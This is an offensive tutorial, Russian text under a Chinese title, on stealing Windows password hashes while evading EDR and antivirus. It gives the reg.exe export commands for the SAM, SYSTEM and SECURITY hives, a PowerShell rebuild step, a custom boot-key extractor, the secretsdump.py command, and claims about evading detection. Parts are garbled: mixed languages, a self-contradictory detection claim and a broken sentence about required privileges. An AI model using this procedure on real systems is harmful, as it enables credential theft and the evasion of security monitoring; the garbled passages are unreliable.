
Windows绕过EDR实现DumpHash
Благодаря расширенному применению системной программы Reg.exe, входящей в белые списки, удалось искусно обойти точки блокировки антивирусного ПО и достичь цели DumpHash в обход EDR.
Согласно практическим испытаниям, данный метод эффективен для систем семейства Windows, отличается невысокой сложностью и имеет практическую ценность.
Практические статьи по проекту:
После публикации статьи аналогичных идей не нашлось ни в отечественных, ни в зарубежных сообществах — первоначально считалось, что это мировая премьера. Однако впоследствии, судя по комментариям подписчиков, данный подход ранее уже публиковался зарубежным экспертом: Dumping LSA secrets: a story about task decorrelation
Исходный код и релизы, описанные в этой статье, опубликованы на GitHub. Делиться непросто — коллеги, если считаете проект достойным, можете поставить Star, премного благодарен!
Выполните на целевой машине команды для экспорта .reg-файлов:
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg
Скачайте .reg-файлы с первого шага на локальную машину и выполните на ней PowerShell-скрипт RegReduction.ps1 из этого проекта для восстановления бинарных файлов:
.\RegReduction.ps1
Примечание: после загрузки скрипта с GitHub его кодировка по умолчанию — UTF-8. Чтобы скрипт корректно выполнялся, необходимо через «Блокнот» изменить кодировку на ANSI (GB2312).

Выполните на целевой машине исполняемый файл BootKey.exe (исходный код — файл BootKey.c из этого проекта):
BootKey.exe

Тест на обход антивируса (10.05.2026): www.virustotal.com

python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

В этой статье описано несколько ключевых операций, но основных шагов на целевой машине всего два:
reg.exe export;BootKey.exe.Различные системы также были протестированы, результаты следующие:
reg.exe export требуются права SYSTEM, тогда как в средах Windows Server 2022 и ниже для экспорта реестра командой reg.exe export достаточно прав обычного администратора (права SYSTEM не требуются). Если после экспорта реестра командой reg.exe export файл имеет размер всего 1 КБ, это означает, что прав недостаточно.BootKey.exe права администратора не требуются. Кроме того, как показала практика, большинство антивирусов (из всех, что встречались, — ни один) его не детектируют и не блокируют.